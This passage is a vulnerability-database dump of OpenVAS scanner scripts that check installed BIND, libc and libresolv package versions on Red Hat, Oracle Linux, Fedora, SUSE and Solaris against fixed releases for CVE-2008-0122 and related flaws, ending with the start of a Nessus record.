isrpmvuln(pkg:\"bind-chroot\", rpm:\"bind-chroot~9.3.4~6.P1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-debuginfo\", 
rpm:\"bind-debuginfo~9.3.4~6.P1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-devel\", rpm:\"bind-devel~9.3.4~6.P1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-libbind-devel\", rpm:\"bind-libbind-devel~9.3.4~6.P1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-libs\", rpm:\"bind-libs~9.3.4~6.P1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-sdb\", rpm:\"bind-sdb~9.3.4~6.P1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.3.4~6.P1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"caching-nameserver\", rpm:\"caching-nameserver~9.3.4~6.P1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:36:19", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0122", "CVE-2007-6283"], "description": "Oracle Linux Local Security Checks ELSA-2008-0300", "modified": "2018-09-28T00:00:00", "published": "2015-10-08T00:00:00", "id": "OPENVAS:1361412562310122582", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122582", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2008-0300", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2008-0300.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 
Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.122582\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-08 14:48:36 +0300 (Thu, 08 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2008-0300\");\n script_tag(name:\"insight\", value:\"ELSA-2008-0300 - bind security, bug fix, and enhancement update. 
Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2008-0300\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2008-0300.html\");\n script_cve_id(\"CVE-2007-6283\", \"CVE-2008-0122\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.3.4~6.P1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-chroot\", rpm:\"bind-chroot~9.3.4~6.P1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-devel\", rpm:\"bind-devel~9.3.4~6.P1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-libbind-devel\", rpm:\"bind-libbind-devel~9.3.4~6.P1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-libs\", rpm:\"bind-libs~9.3.4~6.P1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-sdb\", rpm:\"bind-sdb~9.3.4~6.P1.el5\", 
rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.3.4~6.P1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"caching-nameserver\", rpm:\"caching-nameserver~9.3.4~6.P1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-25T10:56:35", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0122", "CVE-2007-2925", "CVE-2007-6283", "CVE-2007-2926", "CVE-2007-2241"], "description": "Check for the Version of bind", "modified": "2017-07-10T00:00:00", "published": "2009-02-17T00:00:00", "id": "OPENVAS:860907", "href": "http://plugins.openvas.org/nasl.php?oid=860907", "type": "openvas", "title": "Fedora Update for bind FEDORA-2008-0904", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for bind FEDORA-2008-0904\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"bind on Fedora 7\";\ntag_insight = \"BIND (Berkeley Internet Name Domain) is an implementation of the DNS\n (Domain Name System) protocols. BIND includes a DNS server (named),\n which resolves host names to IP addresses; a resolver library\n (routines for applications to use when interfacing with DNS); and\n tools for verifying that the DNS server is operating properly.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/fedora-package-announce/2008-January/msg00782.html\");\n script_id(860907);\n script_version(\"$Revision: 6623 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:10:20 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-17 17:12:43 +0100 (Tue, 17 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2008-0904\");\n script_cve_id(\"CVE-2008-0122\", \"CVE-2007-6283\", \"CVE-2007-2925\", \"CVE-2007-2926\", \"CVE-2007-2241\");\n script_name( \"Fedora Update for bind FEDORA-2008-0904\");\n\n script_summary(\"Check for the Version of bind\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n 
script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC7\")\n{\n\n if ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.4.2~3.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-debuginfo\", rpm:\"bind-debuginfo~9.4.2~3.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-sdb\", rpm:\"bind-sdb~9.4.2~3.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-chroot\", rpm:\"bind-chroot~9.4.2~3.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"caching-nameserver\", rpm:\"caching-nameserver~9.4.2~3.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-devel\", rpm:\"bind-devel~9.4.2~3.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.4.2~3.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-libs\", rpm:\"bind-libs~9.4.2~3.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.4.2~3.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"caching-nameserver\", rpm:\"caching-nameserver~9.4.2~3.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-chroot\", rpm:\"bind-chroot~9.4.2~3.fc7\", rls:\"FC7\")) 
!= NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.4.2~3.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.4.2~3.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-libs\", rpm:\"bind-libs~9.4.2~3.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-sdb\", rpm:\"bind-sdb~9.4.2~3.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-devel\", rpm:\"bind-devel~9.4.2~3.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-debuginfo\", rpm:\"bind-debuginfo~9.4.2~3.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:56:58", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-6283"], "description": "Check for the Version of bind", "modified": "2017-07-10T00:00:00", "published": "2009-02-27T00:00:00", "id": "OPENVAS:861104", "href": "http://plugins.openvas.org/nasl.php?oid=861104", "type": "openvas", "title": "Fedora Update for bind FEDORA-2007-4655", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for bind FEDORA-2007-4655\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This 
program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"bind on Fedora 8\";\ntag_insight = \"BIND (Berkeley Internet Name Domain) is an implementation of the DNS\n (Domain Name System) protocols. BIND includes a DNS server (named),\n which resolves host names to IP addresses; a resolver library\n (routines for applications to use when interfacing with DNS); and\n tools for verifying that the DNS server is operating properly.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/fedora-package-announce/2007-December/msg00587.html\");\n script_id(861104);\n script_version(\"$Revision: 6623 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:10:20 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 16:27:46 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"4.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"FEDORA\", value: \"2007-4655\");\n script_cve_id(\"CVE-2007-6283\");\n script_name( \"Fedora Update for bind FEDORA-2007-4655\");\n\n script_summary(\"Check for the Version of bind\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n 
script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC8\")\n{\n\n if ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.5.0~20.b1.fc8\", rls:\"FC8\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-debuginfo\", rpm:\"bind-debuginfo~9.5.0~20.b1.fc8\", rls:\"FC8\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-chroot\", rpm:\"bind-chroot~9.5.0~20.b1.fc8\", rls:\"FC8\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-devel\", rpm:\"bind-devel~9.5.0~20.b1.fc8\", rls:\"FC8\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.5.0~20.b1.fc8\", rls:\"FC8\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-libs\", rpm:\"bind-libs~9.5.0~20.b1.fc8\", rls:\"FC8\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-sdb\", rpm:\"bind-sdb~9.5.0~20.b1.fc8\", rls:\"FC8\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.5.0~20.b1.fc8\", rls:\"FC8\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-debuginfo\", rpm:\"bind-debuginfo~9.5.0~20.b1.fc8\", rls:\"FC8\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-chroot\", rpm:\"bind-chroot~9.5.0~20.b1.fc8\", rls:\"FC8\")) != 
NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-devel\", rpm:\"bind-devel~9.5.0~20.b1.fc8\", rls:\"FC8\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.5.0~20.b1.fc8\", rls:\"FC8\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-libs\", rpm:\"bind-libs~9.5.0~20.b1.fc8\", rls:\"FC8\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-sdb\", rpm:\"bind-sdb~9.5.0~20.b1.fc8\", rls:\"FC8\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.5.0~20.b1.fc8\", rls:\"FC8\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-07-26T08:55:44", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0122"], "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n bind-utils\n bind-devel\n bind\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5022113 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "modified": "2017-07-11T00:00:00", "published": "2009-10-10T00:00:00", "id": "OPENVAS:65584", "href": "http://plugins.openvas.org/nasl.php?oid=65584", "type": "openvas", "title": "SLES9: Security update for bind", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5022113.nasl 6666 2017-07-11 13:13:36Z cfischer $\n# Description: Security update for bind\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. 
One or more of the following packages\nare affected:\n\n bind-utils\n bind-devel\n bind\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5022113 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_id(65584);\n script_version(\"$Revision: 6666 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:13:36 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2008-0122\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SLES9: Security update for bind\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.3.4~4.6\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:13:55", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0122"], "description": 
"Check for the Version of libc.so.1.9", "modified": "2017-02-20T00:00:00", "published": "2009-06-03T00:00:00", "id": "OPENVAS:855088", "href": "http://plugins.openvas.org/nasl.php?oid=855088", "type": "openvas", "title": "Solaris Update for libc.so.1.9 138387-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for libc.so.1.9 138387-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"libc.so.1.9 on solaris_5.10_sparc\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n libc.so.1.9\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_id(855088);\n script_version(\"$Revision: 5359 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-20 12:20:19 +0100 (Mon, 20 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-03 12:34:39 +0200 (Wed, 03 Jun 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n 
script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"138387-01\");\n script_cve_id(\"CVE-2008-0122\");\n script_name( \"Solaris Update for libc.so.1.9 138387-01\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-138387-01-1\");\n\n script_summary(\"Check for the Version of libc.so.1.9\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"138387-01\", package:\"SUNWbcp\") < 0)\n{\n security_message(0);\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:40:24", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0122"], "description": "Check for the Version of libresolv.so.2, in.named and BIND9", "modified": "2018-04-06T00:00:00", "published": "2009-06-03T00:00:00", "id": "OPENVAS:1361412562310855168", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310855168", "type": "openvas", "title": "Solaris Update for libresolv.so.2, in.named and BIND9 109326-24", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for libresolv.so.2, in.named and BIND9 109326-24\n#\n# Authors:\n# 
System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"libresolv.so.2, in.named and BIND9 on solaris_5.8_sparc\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n libresolv.so.2, in.named and BIND9\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.855168\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-03 12:37:58 +0200 (Wed, 03 Jun 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"109326-24\");\n script_cve_id(\"CVE-2008-0122\");\n script_name( \"Solaris Update for libresolv.so.2, in.named and BIND9 109326-24\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-109326-24-1\");\n\n script_tag(name:\"summary\", 
value:\"Check for the Version of libresolv.so.2, in.named and BIND9\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.8\", arch:\"sparc\", patch:\"109326-24\", package:\"SUNWarc SUNWarcx SUNWcsl SUNWcsr SUNWhea SUNWcslx SUNWcstlx SUNWcsu SUNWcstl\") < 0)\n{\n security_message(0);\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2021-01-12T10:06:36", "description": "9.5.0-P1 release which contains fix for CVE-2008-1447. This update\nalso fixes parsing of inner ACLs.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
